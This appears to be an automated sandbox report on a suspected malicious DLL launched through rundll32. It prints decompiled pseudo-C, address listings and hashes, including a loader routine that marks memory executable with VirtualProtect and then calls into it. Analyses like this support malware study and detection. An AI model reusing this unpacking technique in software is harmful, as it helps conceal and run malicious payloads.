                          0x6e248191
                          0x00000000
                          0x6e248191
                          0x6e248186
                          0x6e248186
                          0x6e248189
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24818b
                          0x6e2480d7
                          0x6e2480d7
                          0x6e2480da
                          0x6e24816d
                          0x6e24816d
                          0x6e248170
                          0x6e248179
                          0x6e24817d
                          0x6e24817d
                          0x00000000
                          0x6e24817d
                          0x6e248172
                          0x6e248172
                          0x6e248175
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e248177
                          0x6e2480e0
                          0x6e2480e0
                          0x6e2480e3
                          0x6e24810c
                          0x6e24810f
                          0x6e248113
                          0x6e24811d
                          0x6e248115
                          0x6e248115
                          0x6e248115
                          0x6e248123
                          0x6e248126
                          0x6e248142
                          0x6e248142
                          0x6e248145
                          0x6e248148
                          0x00000000
                          0x00000000
                          0x6e24814e
                          0x6e248151
                          0x6e248151
                          0x6e248154
                          0x00000000
                          0x00000000
                          0x6e248158
                          0x6e24815b
                          0x6e24815e
                          0x6e248161
                          0x6e248163
                          0x6e248166
                          0x6e248169
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24816b
                          0x6e248128
                          0x6e248128
                          0x6e24812b
                          0x00000000
                          0x00000000
                          0x6e24812d
                          0x6e248135
                          0x6e248138
                          0x6e24813b
                          0x6e24813b
                          0x00000000
                          0x6e248126
                          0x6e2480e5
                          0x6e2480e8
                          0x00000000
                          0x00000000
                          0x6e2480ef
                          0x6e2480ef
                          0x6e2480f2
                          0x6e248105
                          0x00000000
                          0x6e248105
                          0x6e2480f5
                          0x6e2480f5
                          0x6e2480f8
                          0x00000000
                          0x00000000
                          0x6e2480fe
                          0x00000000
                          0x6e2480fe
                          0x6e247f96
                          0x6e248094
                          0x6e248094
                          0x6e248097
                          0x6e2480ba
                          0x6e2480be
                          0x6e2480be
                          0x00000000
                          0x6e2480be
                          0x6e248099
                          0x6e248099
                          0x6e24809c
                          0x00000000
                          0x00000000
                          0x6e24809e
                          0x6e24809e
                          0x6e2480a1
                          0x6e2480b3
                          0x00000000
                          0x6e2480b3
                          0x6e2480a3
                          0x6e2480a3
                          0x6e2480a6
                          0x00000000
                          0x00000000
                          0x6e2480ac
                          0x00000000
                          0x6e2480ac
                          0x6e247f9c
                          0x6e247f9f
                          0x6e248041
                          0x6e248041
                          0x6e248046
                          0x6e24804c
                          0x6e24804c
                          0x6e24804d
                          0x6e248050
                          0x6e248056
                          0x6e248059
                          0x6e24805c
                          0x00000000
                          0x00000000
                          0x6e248062
                          0x6e248065
                          0x6e248065
                          0x6e248068
                          0x00000000
                          0x00000000
                          0x6e248070
                          0x6e248071
                          0x6e248074
                          0x6e248077
                          0x00000000
                          0x00000000
                          0x6e24807f
                          0x6e248082
                          0x6e248085
                          0x6e248087
                          0x6e24808a
                          0x6e24808d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24808f
                          0x6e248065
                          0x00000000
                          0x6e248050
                          0x6e247fa5
                          0x6e247fa8
                          0x6e247fbd
                          0x6e247fc3
                          0x6e247fca
                          0x6e247fcc
                          0x6e248027
                          0x6e24802d
                          0x6e24802e
                          0x6e248030
                          0x6e248035
                          0x6e248035
                          0x6e247fce
                          0x6e247fce
                          0x6e247fd1
                          0x6e247fd1
                          0x6e248038
                          0x00000000
                          0x6e248038
                          0x6e247faa
                          0x6e247fad
                          0x6e248007
                          0x6e248007
                          0x6e24800a
                          0x6e248016
                          0x6e24801a
                          0x6e24801a
                          0x00000000
                          0x6e24801a
                          0x6e24800c
                          0x6e24800c
                          0x6e24800f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e248011
                          0x6e247faf
                          0x6e247fb2
                          0x6e247fd6
                          0x6e247fd6
                          0x6e247fd9
                          0x6e247ffc
                          0x6e248000
                          0x6e248000
                          0x00000000
                          0x6e248000
                          0x6e247fdb
                          0x6e247fdb
                          0x6e247fde
                          0x00000000
                          0x00000000
                          0x6e247fe0
                          0x6e247fe0
                          0x6e247fe3
                          0x6e247ff5
                          0x00000000
                          0x6e247ff5
                          0x6e247fe5
                          0x6e247fe5
                          0x6e247fe8
                          0x00000000
                          0x00000000
                          0x6e247fee
                          0x00000000
                          0x6e247fee
                          0x6e247fb4
                          0x6e247fb7
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e247fb7
                          0x00000000
                          0x6e2481e2
                          0x6e247eda
                          0x6e247ee1
                          0x6e247f0a
                          0x6e247ee3
                          0x6e247ef2
                          0x6e247ef2
                          0x6e247f11
                          0x6e247f13
                          0x6e247f16
                          0x6e247f3b
                          0x6e247f3c
                          0x00000000
                          0x6e247f18
                          0x6e247f18
                          0x6e247f1b
                          0x6e247f1e
                          0x6e247f25
                          0x6e247f28
                          0x6e247f2b
                          0x6e247f2e
                          0x6e247f31
                          0x6e247f33
                          0x6e247f36
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e247f36
                          0x6e247f38
                          0x00000000
                          0x6e247f38
                          0x6e247f16
                          0x6e247e7e
                          0x6e247e80
                          0x6e247e82
                          0x6e247e8a
                          0x6e247eaf
                          0x6e247eb1
                          0x6e247ebb
                          0x6e247ebd
                          0x6e247ec0
                          0x6e247ec1
                          0x6e247ec3
                          0x00000000
                          0x00000000
                          0x6e247ec9
                          0x6e247eaa
                          0x6e247eaa
                          0x00000000
                          0x6e247eaa
                          0x6e247e8e
                          0x6e247e92
                          0x6e247e97
                          0x6e247e99
                          0x6e247e9e
                          0x00000000
                          0x00000000
                          0x6e247ea4
                          0x00000000
                          0x6e247ea4
                          0x6e247e65

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __freea
                          • String ID: a/p$am/pm
                          • API String ID: 240046367-3206640213
                          • Opcode ID: 1135db9fb08671d6d60d0ed20f61cfa544f943afaf15cefb0e846a7834a4449f
                          • Instruction ID: 62c3d0ebb481481a39a7dda47ff20ff33918b03a5916278e0e20b5e2f99a19c4
                          • Opcode Fuzzy Hash: 1135db9fb08671d6d60d0ed20f61cfa544f943afaf15cefb0e846a7834a4449f
                          • Instruction Fuzzy Hash: DFD1D37593424FDBDB4D8FE8C850BAAB7B2FF06301F14455AE928AB284E3759940CBD1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E1FF218, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 217memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 69%
                          			E6E1FF218(signed int __edx) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				signed char _v24;
				signed int _t35;
				signed short _t37;
				void* _t45;
				intOrPtr _t46;
				signed int _t52;
				signed short _t60;
				signed char _t70;
				signed int _t73;
				signed char _t82;
				signed char _t85;
				signed short _t89;
				signed int _t97;
				void* _t99;
				signed int _t103;
				intOrPtr _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;
				signed char _t111;
				signed int _t117;
				signed int _t118;
				signed int _t123;
				signed int _t129;
				signed int _t130;
				signed char _t134;
				signed int _t135;
				signed char _t136;
				signed int _t138;
				void* _t139;
				signed short* _t140;
				signed short* _t144;
				signed short _t146;
				void* _t151;
				void* _t154;
				void* _t156;
				void* _t157;

				_t35 =  *0x6e2c59e6 & 0x0000ffff;
				_v12 = __edx;
				asm("cdq");
				_t103 = __edx;
				_v20 = 0xf;
				_t129 =  *0x6e2c59d8; // 0x69ab5d81
				_t144 = 0x6e2c59e6;
				_t138 =  *0x6e2c5a00; // 0x0
				_v24 = _t35;
				_v16 = __edx;
				do {
					if(_t129 != _t35) {
						L3:
						_t5 = _t129 + 5; // 0x69ab5d86
						_t138 = _t138 * ( *_t144 & 0x0000ffff);
						_t37 =  *0x6e2c59f0; // 0x4a480090
						_t105 = _t5 + _t138;
						 *0x6e2c5a90 = _t105;
						if(_t105 != (_t37 & 0x0000ffff)) {
							_t35 = _v24;
							_t103 = _v16;
							goto L5;
						}
					} else {
						_t151 =  *0x6e2c59dc - _t103; // 0x0
						if(_t151 == 0) {
							goto L5;
						} else {
							goto L3;
						}
					}
					break;
					L5:
					_t144 =  &(_t144[1]);
				} while (_t144 < 0x6e2c5a44);
				_t145 = _v12 * 0x10e1d;
				 *0x6e2c5a00 = _t138;
				_t139 =  *0x6e2dc8d0; // 0x6e2c86a0
				 *0x6e2c5a04 = _t129 -  *0x6e2c5a04 + 0x11;
				 *0x6e2c8698 = _t139;
				 *0x6e2c59d8 = E6E2201E0(_v12 * 0x10e1d, 0, _t129,  *0x6e2c59dc);
				 *0x6e2c59dc = _t129;
				VirtualProtect(_t139, 0x305a, 0x40, 0x6e2c869c);
				_t130 =  *0x6e2c59d0; // 0x96574ad2
				_t45 = 6;
				_v24 = _t130;
				_t154 =  *0x6e2c5a02 - _t45; // 0x0
				if(_t154 == 0) {
					_t46 =  *0x6e2c5a90; // 0x9dec7d1b
					 *0x6e2c5a00 = _t46 + 0x11dde + _t130;
				} else {
					 *0x6e2c5a90 =  *0x6e2c5a90 +  ~_t130 -  *0x6e2c5a00 * 0x3d;
				}
				_t106 =  *0x6e2c59d8; // 0x69ab5d81
				_t131 =  *0x6e2c59e6 & 0x0000ffff;
				_v5 = _t130 + _t106;
				if(( *0x6e2c59f2 & 0x0000ffff) + ( *0x6e2c59e6 & 0x0000ffff) != 0x32) {
					_t52 = E6E2201E0(_t145, 0, _t106,  *0x6e2c59dc);
					_v16 = _t52;
					_v20 = _t52 * 0x00000037 & 0x0000ffff;
				} else {
					_t97 =  *0x6e2c59dc; // 0x0
					_t99 = E6E2201E0(E6E2201E0(_t106, _t97, _t106, _t97), _t131, 0xfffef1e3, 0xffffffff);
					_push(0);
					_v16 = _t99 + _v12 + 0xf;
				}
				_t140 = 0x6e2c59e6;
				_t109 = _v16;
				_t134 = 0x70 * (_v24 & 0x000000ff) + 0x70;
				_v24 = _t134;
				 *0x6e2c5a04 = _t134;
				_t156 =  *0x6e2c5a04 - 0x1b47; // 0xac
				if(_t156 != 0) {
					_t60 = _v20;
				} else {
					asm("cdq");
					_t134 = _v24;
					_t123 = _t109 + ( *0x6e2c59e6 & 0x0000ffff);
					_v16 = _t123;
					_t60 = _v20 + _t123 * 2 + 0x3b;
				}
				_t110 = 6;
				_t157 =  *0x6e2c5a02 - _t110; // 0x0
				if(_t157 == 0) {
					 *0x6e2c5a00 = (_t60 & 0x0000ffff) + 0x11dde + (_t134 & 0x000000ff);
				}
				_t111 =  *0x6e2c59d0; // 0x96574ad2
				 *0x6e2c59dc =  *0x6e2c59dc & 0x00000000;
				_t146 = _v16 + 0x00000005 + _t111 & 0x0000ffff;
				 *0x6e2c59d8 = _t146 - _v12 - 0x54;
				 *0x6e2c59d0 = _t111 + 0x23bbc + (_t134 & 0x000000ff) * 2;
				 *0x6e2c8698();
				_t70 =  *0x6e2c59d0; // 0x96574ad2
				_t135 = _v12;
				 *0x6e2c59d8 =  *0x6e2c59d8 + _t70 + 0x3b + ( *0x6e2c5a04 & 0x000000ff);
				_t73 =  *0x6e2c59e6 & 0x0000ffff;
				asm("adc dword [0x6e2c59dc], 0x0");
				do {
					if(_t135 == _t73) {
						goto L22;
					} else {
						_t146 = ( *_t140 & 0x0000ffff) * (_t146 & 0x0000ffff) & 0x0000ffff;
						_t117 = _t135 + 5 + _t146;
						 *0x6e2c59dc = 0;
						_t89 =  *0x6e2c59f0; // 0x4a480090
						asm("cdq");
						 *0x6e2c59d8 = _t117;
						if(_t117 != (_t89 & 0x0000ffff)) {
							L21:
							_t73 =  *0x6e2c59e6 & 0x0000ffff;
							_t135 = _v12;
							goto L22;
						} else {
							_t73 = 0;
							if(0 != _t135) {
								goto L21;
							}
						}
					}
					break;
					L22:
					_t140 =  &(_t140[1]);
				} while (_t140 < 0x6e2c5a44);
				asm("das");
				asm("fstp9 st1");
				_t118 =  *0x6e2c59d8; // 0x69ab5d81
				_t136 =  *0x6e2c59d0; // 0x96574ad2
				_push(0);
				asm("adc [0x6e2c59dc], eax");
				 *0x6e2c59d8 = _t118 + (_t146 - _t118 * 0x0000003d - _v12 & 0x0000ffff) + 0x3b + _t136;
				_t82 = ((_t136 & 0x000000ff) * ( *0x6e2c5a04 & 0x000000ff) & 0x000000ff) * 0x1d;
				 *0x6e2c5a04 = _t82;
				_t85 = (_t82 & 0x000000ff) * 0x36 + _t136;
				 *0x6e2c59d0 = _t85;
				return _t85;
			}












































                          0x6e1ff21e
                          0x6e1ff225
                          0x6e1ff228
                          0x6e1ff22a
                          0x6e1ff22c
                          0x6e1ff233
                          0x6e1ff239
                          0x6e1ff23f
                          0x6e1ff245
                          0x6e1ff248
                          0x6e1ff24b
                          0x6e1ff24d
                          0x6e1ff257
                          0x6e1ff25a
                          0x6e1ff25d
                          0x6e1ff260
                          0x6e1ff268
                          0x6e1ff26a
                          0x6e1ff272
                          0x6e1ff274
                          0x6e1ff277
                          0x00000000
                          0x6e1ff277
                          0x6e1ff24f
                          0x6e1ff24f
                          0x6e1ff255
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e1ff255
                          0x00000000
                          0x6e1ff27a
                          0x6e1ff27a
                          0x6e1ff27d
                          0x6e1ff28b
                          0x6e1ff29c
                          0x6e1ff2a2
                          0x6e1ff2a8
                          0x6e1ff2b2
                          0x6e1ff2ca
                          0x6e1ff2cf
                          0x6e1ff2d5
                          0x6e1ff2db
                          0x6e1ff2e3
                          0x6e1ff2e4
                          0x6e1ff2e7
                          0x6e1ff2ee
                          0x6e1ff305
                          0x6e1ff311
                          0x6e1ff2f0
                          0x6e1ff2fd
                          0x6e1ff2fd
                          0x6e1ff316
                          0x6e1ff31f
                          0x6e1ff326
                          0x6e1ff335
                          0x6e1ff36b
                          0x6e1ff370
                          0x6e1ff379
                          0x6e1ff337
                          0x6e1ff337
                          0x6e1ff34e
                          0x6e1ff356
                          0x6e1ff35c
                          0x6e1ff35c
                          0x6e1ff385
                          0x6e1ff395
                          0x6e1ff3a0
                          0x6e1ff3a2
                          0x6e1ff3a5
                          0x6e1ff3ab
                          0x6e1ff3b2
                          0x6e1ff3cf
                          0x6e1ff3b4
                          0x6e1ff3bb
                          0x6e1ff3bc
                          0x6e1ff3bf
                          0x6e1ff3c4
                          0x6e1ff3ca
                          0x6e1ff3ca
                          0x6e1ff3d4
                          0x6e1ff3d5
                          0x6e1ff3dc
                          0x6e1ff3eb
                          0x6e1ff3eb
                          0x6e1ff3f3
                          0x6e1ff3fc
                          0x6e1ff405
                          0x6e1ff416
                          0x6e1ff421
                          0x6e1ff426
                          0x6e1ff42c
                          0x6e1ff43b
                          0x6e1ff440
                          0x6e1ff446
                          0x6e1ff44d
                          0x6e1ff454
                          0x6e1ff456
                          0x00000000
                          0x6e1ff458
                          0x6e1ff461
                          0x6e1ff469
                          0x6e1ff46d
                          0x6e1ff472
                          0x6e1ff47a
                          0x6e1ff47b
                          0x6e1ff483
                          0x6e1ff48b
                          0x6e1ff48b
                          0x6e1ff492
                          0x00000000
                          0x6e1ff485
                          0x6e1ff485
                          0x6e1ff489
                          0x00000000
                          0x00000000
                          0x6e1ff489
                          0x6e1ff483
                          0x00000000
                          0x6e1ff495
                          0x6e1ff495
                          0x6e1ff498
                          0x6e1ff4a1
                          0x6e1ff4a2
                          0x6e1ff4a4
                          0x6e1ff4aa
                          0x6e1ff4b3
                          0x6e1ff4c5
                          0x6e1ff4d2
                          0x6e1ff4e3
                          0x6e1ff4e6
                          0x6e1ff4f1
                          0x6e1ff4f3
                          0x6e1ff4f9

                          APIs
                          • VirtualProtect.KERNEL32(6E2C86A0,0000305A,00000040,6E2C869C,?,00000000,69AB5D81,008B4A48,?), ref: 6E1FF2D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID: DZ,n$DZ,n$EQ
                          • API String ID: 544645111-2992341796
                          • Opcode ID: 7b69f7bbc56599ba95007a87458e53b184574e811696793878eaa64c24477857
                          • Instruction ID: 331258f8ce98d70d3860fa178d7b431092c3152db7a2a0804e97dc074c997fe7
                          • Opcode Fuzzy Hash: 7b69f7bbc56599ba95007a87458e53b184574e811696793878eaa64c24477857
                          • Instruction Fuzzy Hash: ED811271A415618FCF88CFAAC88D6797BF6BB5AB10B20815BE441D7380E378E541DBB1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E204267, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON
                          Download Yara Rule
                          C-Code - Quality: 87%
                          			E6E204267(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t44;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t54;
				intOrPtr _t55;
				void* _t56;
				intOrPtr _t58;
				void* _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int _t76;
				intOrPtr _t81;
				signed int _t82;
				void* _t85;
				signed int _t87;
				signed int _t89;

				E6E220117(0x6e2680ee, __ebx, __edi, __esi, 0x20);
				 *((intOrPtr*)(_t85 - 0x14)) = 0x6e2c6b60;
				_t65 = E6E241EEC(L"For");
				_t38 =  *0x6e2c6b60; // 0x6e26aabc
				 *((intOrPtr*)(_t85 - 0x18)) = _t65;
				_t3 = _t38 + 4; // 0x8
				_t39 =  *_t3;
				_t4 = _t39 + 0x6e2c6b84; // 0x0
				_t62 =  *_t4;
				_t5 = _t39 + 0x6e2c6b80; // 0x0
				_t81 =  *_t5;
				_t87 = _t62;
				if(_t87 < 0) {
					L7:
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x24], xmm0");
					_t62 =  *(_t85 - 0x20);
					_t82 =  *(_t85 - 0x24);
				} else {
					if(_t87 > 0) {
						L6:
						_t82 = _t81 - _t65;
						asm("sbb ebx, esi");
					} else {
						if(_t81 <= 0) {
							goto L7;
						} else {
							_t89 = _t62;
							if(_t89 < 0 || _t89 <= 0 && _t81 <= _t65) {
								goto L7;
							} else {
								goto L6;
							}
						}
					}
				}
				_t8 = _t85 - 0x14; // 0x6e2c6b60
				_push( *_t8);
				E6E20220B(_t62, _t85 - 0x2c, _t82, 0);
				 *((intOrPtr*)(_t85 - 4)) = 0;
				if( *((char*)(_t85 - 0x28)) != 0) {
					 *((char*)(_t85 - 4)) = 1;
					_t67 =  *0x6e2c6b60; // 0x6e26aabc
					_t13 = _t67 + 4; // 0x8
					_t14 =  *_t13 + 0x6e2c6b74; // 0x201
					__eflags = ( *_t14 & 0x000001c0) - 0x40;
					if(( *_t14 & 0x000001c0) == 0x40) {
						L16:
						_t18 = _t67 + 4; // 0x8
						_t44 =  *_t18;
						_t20 = _t44 + 0x6e2c6b98; // 0x6e2c6bb0
						_t46 =  *((intOrPtr*)( *((intOrPtr*)( *_t20)) + 0x24))(L"For",  *((intOrPtr*)(_t85 - 0x18)), 0);
						__eflags = _t46 -  *((intOrPtr*)(_t85 - 0x18));
						if(_t46 !=  *((intOrPtr*)(_t85 - 0x18))) {
							goto L22;
						} else {
							__eflags = _t76;
							if(_t76 != 0) {
								goto L22;
							} else {
								while(1) {
									__eflags = _t62;
									if(__eflags < 0) {
										break;
									}
									if(__eflags > 0) {
										L21:
										_t54 =  *0x6e2c6b60; // 0x6e26aabc
										_t23 = _t54 + 4; // 0x8
										_t55 =  *_t23;
										_t24 = _t55 + 0x6e2c6ba0; // 0x20
										_t25 = _t55 + 0x6e2c6b98; // 0x6e2c6bb0
										_t56 = E6E203F18( *_t25,  *_t24 & 0x0000ffff);
										__eflags = 0xffff - _t56;
										if(0xffff != _t56) {
											_t82 = _t82 + 0xffffffff;
											asm("adc ebx, 0xffffffff");
											continue;
										} else {
											goto L22;
										}
									} else {
										__eflags = _t82;
										if(_t82 <= 0) {
											break;
										} else {
											goto L21;
										}
									}
									goto L25;
								}
								_t63 = 0;
							}
						}
					} else {
						while(1) {
							__eflags = _t62;
							if(__eflags < 0) {
								goto L16;
							}
							if(__eflags > 0) {
								L14:
								_t15 = _t67 + 4; // 0x8
								_t58 =  *_t15;
								_t16 = _t58 + 0x6e2c6ba0; // 0x20
								_t76 =  *_t16 & 0x0000ffff;
								_t17 = _t58 + 0x6e2c6b98; // 0x6e2c6bb0
								_t59 = E6E203F18( *_t17, _t76);
								__eflags = 0xffff - _t59;
								if(0xffff == _t59) {
									L22:
									_t63 = 4;
								} else {
									_t67 =  *0x6e2c6b60; // 0x6e26aabc
									_t82 = _t82 + 0xffffffff;
									asm("adc ebx, 0xffffffff");
									continue;
								}
							} else {
								__eflags = _t82;
								if(_t82 <= 0) {
									goto L16;
								} else {
									goto L14;
								}
							}
							goto L25;
						}
						goto L16;
					}
					L25:
					_t47 =  *0x6e2c6b60; // 0x6e26aabc
					_t26 = _t47 + 4; // 0x8
					_t48 =  *_t26;
					 *((intOrPtr*)(_t48 + 0x6e2c6b80)) = 0;
					 *((intOrPtr*)(_t48 + 0x6e2c6b84)) = 0;
					 *((intOrPtr*)(_t85 - 4)) = 0;
				} else {
					_t63 = 4;
				}
				_t49 =  *0x6e2c6b60; // 0x6e26aabc
				_t30 = _t49 + 4; // 0x8
				_t32 =  *_t30 +  *((intOrPtr*)(_t85 - 0x14)) + 0xc; // 0x0
				E6E203A25( *_t30 +  *((intOrPtr*)(_t85 - 0x14)),  *_t32 | _t63, 0);
				E6E2021C1(_t63, _t85 - 0x2c, _t82,  *_t32 | _t63);
				return E6E220075( *((intOrPtr*)(_t85 - 0x14)));
			}

























                          0x6e20426e
                          0x6e204278
                          0x6e204287
                          0x6e204289
                          0x6e20428e
                          0x6e204291
                          0x6e204291
                          0x6e204294
                          0x6e204294
                          0x6e20429a
                          0x6e20429a
                          0x6e2042a0
                          0x6e2042a2
                          0x6e2042ba
                          0x6e2042ba
                          0x6e2042bd
                          0x6e2042c2
                          0x6e2042c5
                          0x6e2042a4
                          0x6e2042a4
                          0x6e2042b4
                          0x6e2042b4
                          0x6e2042b6
                          0x6e2042a6
                          0x6e2042a8
                          0x00000000
                          0x6e2042aa
                          0x6e2042aa
                          0x6e2042ac
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e2042ac
                          0x6e2042a8
                          0x6e2042a4
                          0x6e2042c8
                          0x6e2042c8
                          0x6e2042ce
                          0x6e2042d3
                          0x6e2042da
                          0x6e2042e4
                          0x6e2042e8
                          0x6e2042ee
                          0x6e2042f1
                          0x6e2042fc
                          0x6e2042ff
                          0x6e20433c
                          0x6e20433c
                          0x6e20433c
                          0x6e204343
                          0x6e204350
                          0x6e204353
                          0x6e204356
                          0x00000000
                          0x6e204358
                          0x6e204358
                          0x6e20435a
                          0x00000000
                          0x6e20435c
                          0x6e20435c
                          0x6e20435c
                          0x6e20435e
                          0x00000000
                          0x00000000
                          0x6e204360
                          0x6e204366
                          0x6e204366
                          0x6e20436b
                          0x6e20436b
                          0x6e20436e
                          0x6e204375
                          0x6e20437c
                          0x6e204389
                          0x6e20438c
                          0x6e204393
                          0x6e204396
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e204362
                          0x6e204362
                          0x6e204364
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e204364
                          0x00000000
                          0x6e204360
                          0x6e20439b
                          0x6e20439b
                          0x6e20435a
                          0x6e204301
                          0x6e204301
                          0x6e204301
                          0x6e204303
                          0x00000000
                          0x00000000
                          0x6e204305
                          0x6e20430b
                          0x6e20430b
                          0x6e20430b
                          0x6e20430e
                          0x6e20430e
                          0x6e204315
                          0x6e20431c
                          0x6e204329
                          0x6e20432c
                          0x6e20438e
                          0x6e204390
                          0x6e20432e
                          0x6e20432e
                          0x6e204334
                          0x6e204337
                          0x00000000
                          0x6e204337
                          0x6e204307
                          0x6e204307
                          0x6e204309
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e204309
                          0x00000000
                          0x6e204305
                          0x00000000
                          0x6e204301
                          0x6e20439d
                          0x6e20439d
                          0x6e2043a2
                          0x6e2043a2
                          0x6e2043a5
                          0x6e2043ab
                          0x6e2043d6
                          0x6e2042dc
                          0x6e2042de
                          0x6e2042de
                          0x6e2043d9
                          0x6e2043df
                          0x6e2043e5
                          0x6e2043eb
                          0x6e2043f3
                          0x6e204400

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: H_prolog3_catch_wcslen
                          • String ID: For$`k,n
                          • API String ID: 1260878687-1763375410
                          • Opcode ID: 388df7aa412f50ede240fee3d40f7d71c0cf55d3a2a2837a6dea8f03a4796fad
                          • Instruction ID: 67532f0e83a35c3b0ebb2299c210994367130e8a5225051f6bfa046bdc138d45
                          • Opcode Fuzzy Hash: 388df7aa412f50ede240fee3d40f7d71c0cf55d3a2a2837a6dea8f03a4796fad
                          • Instruction Fuzzy Hash: A6419C79A2021E8FCB40DBE8C5D49ACB7B3BF9AB14B208245E551BB3D1C670E842C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E258AAC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 66%
                          			E6E258AAC(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				signed int _v8;
				char _v264;
				char _v268;
				char _v272;
				void* __esi;
				void* __ebp;
				signed int _t10;
				void* _t14;
				signed int _t22;
				void* _t28;
				signed int _t37;
				signed int _t43;
				void* _t44;
				signed int _t45;
				signed int _t49;

				_t35 = __edx;
				_t47 = _t49;
				_t10 =  *0x6e2c506c; // 0x8e829fa6
				_v8 = _t10 ^ _t49;
				 *0x6e2c5384 =  *0x6e2c5384 | 0xffffffff;
				 *0x6e2c5378 =  *0x6e2c5378 | 0xffffffff;
				_push(__ebx);
				_push(__edi);
				_t37 = 0;
				 *0x6e2c7a10 = 0;
				_t14 = E6E251216(0x6e272130, __edx, 0, __eflags,  &_v268,  &_v264, 0x100, 0x6e272130);
				if(_t14 != 0) {
					__eflags = _t14 - 0x22;
					if(__eflags == 0) {
						_t45 = E6E24F26D(_t28, _v268);
						__eflags = _t45;
						if(__eflags != 0) {
							_t22 = E6E251216(0x6e272130, __edx, 0, __eflags,  &_v272, _t45, _v268, 0x6e272130);
							__eflags = _t22;
							if(_t22 == 0) {
								E6E24CBD3(0);
								_t37 = _t45;
							} else {
								_push(_t45);
								goto L6;
							}
						} else {
							_push(0);
							L6:
							E6E24CBD3();
						}
					}
				} else {
					_t37 =  &_v264;
				}
				asm("sbb esi, esi");
				_t43 =  ~(_t37 -  &_v264) & _t37;
				if(_t37 == 0) {
					L14:
					E6E258951(0x6e272130, _t37, __eflags);
				} else {
					_t57 =  *_t37;
					if( *_t37 == 0) {
						goto L14;
					} else {
						_push(_t37);
						E6E25877C(0x6e272130, _t37, _t57);
					}
				}
				E6E24CBD3(_t43);
				_pop(_t44);
				return E6E21F8A5(_v8 ^ _t47, _t35, _t44);
			}


















                          0x6e258aac
                          0x6e258aaf
                          0x6e258ab7
                          0x6e258abe
                          0x6e258ac1
                          0x6e258ace
                          0x6e258ad5
                          0x6e258ad7
                          0x6e258add
                          0x6e258aec
                          0x6e258af3
                          0x6e258afd
                          0x6e258b07
                          0x6e258b0a
                          0x6e258b17
                          0x6e258b1a
                          0x6e258b1c
                          0x6e258b35
                          0x6e258b3d
                          0x6e258b3f
                          0x6e258b45
                          0x6e258b4a
                          0x6e258b41
                          0x6e258b41
                          0x00000000
                          0x6e258b41
                          0x6e258b1e
